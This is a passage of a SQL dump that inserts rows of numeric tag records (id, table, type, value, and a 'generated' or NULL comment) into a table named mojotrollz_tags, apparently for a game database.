1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181510, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181511, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181511, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181511, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181511, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181512, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181512, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181512, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181512, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181513, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181513, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181513, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181513, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181514, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181514, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181514, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181514, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181515, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181515, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181515, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181515, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181516, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181516, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181516, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181516, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181517, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181517, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181517, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181517, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181518, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181518, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181518, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181518, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181519, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181519, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181519, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181519, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181520, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181520, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181520, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181520, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181521, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181521, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181521, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181521, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181522, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181522, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181522, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181522, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181523, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181523, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181523, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181523, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181524, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181524, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181524, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181524, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181525, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181525, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181525, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181525, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181526, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181526, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181526, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181526, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181527, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181527, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181527, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181527, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181528, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181528, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181528, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181528, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181529, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181529, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181529, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181529, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181530, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181530, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181530, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181530, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181531, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181531, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181531, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181531, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181532, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181532, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181532, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181532, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181533, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181533, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181533, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181533, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181534, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181534, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181534, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181534, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181535, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181535, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181535, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181535, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181536, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181536, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181536, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181536, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181537, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181537, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181537, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181537, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181538, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181538, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181538, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181538, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181539, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181539, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181539, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181539, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181540, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181540, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181540, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181540, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181541, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181541, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181541, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181541, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181542, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181542, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181542, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181542, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181543, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181543, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181543, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181543, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181544, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181544, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181544, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181544, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181545, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181545, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181545, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181545, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181546, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181546, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181546, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181546, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181547, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181547, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181547, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181547, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181548, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181548, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181548, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181548, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181549, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181549, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181549, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181549, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181550, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181550, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181550, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181550, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181551, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181551, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181551, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181551, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181552, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181552, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181552, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181552, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181575, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181575, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181575, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181575, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181576, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181576, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181576, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181576, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181577, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181577, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181577, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181577, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181578, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181578, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181578, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181578, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181596, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181598, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181603, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181605, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181617, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181618, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181619, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181620, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181624, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181625, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181629, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181631, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181633, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181634, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181635, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181636, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181639, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181643, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181676, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181676, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181676, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181676, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181677, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181677, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181677, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181677, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181678, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181678, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181678, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181678, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181681, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181682, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181686, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181687, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181690, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181695, 2, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181695, 2, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181695, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181695, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181825, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181899, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181913, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181916, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181955, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181963, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182011, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182011, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182063, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182068, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182071, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182072, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182075, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182076, 2, 1, 0, 'generated'); 